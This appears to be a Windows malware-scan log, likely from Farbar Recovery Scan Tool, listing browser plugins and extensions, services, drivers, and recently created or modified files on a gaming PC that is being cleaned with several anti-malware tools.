FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [File not signed]
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 alspgeyc; C:\Windows\System32\Drivers\alspgeyc.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 19:58 - 2018-03-19 20:33 - 000000000 ____D C:\ProgramData\RogueKiller
2018-03-19 19:58 - 2018-03-19 19:58 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2018-03-19 19:57 - 2018-03-19 19:57 - 000000867 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\Program Files\RogueKiller
2018-03-18 09:03 - 2018-03-19 20:35 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-19 19:52 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-19 19:52 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-19 16:50 - 001422732 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 20:07 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 20:07 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-19 19:52 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-19 19:52 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:56 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
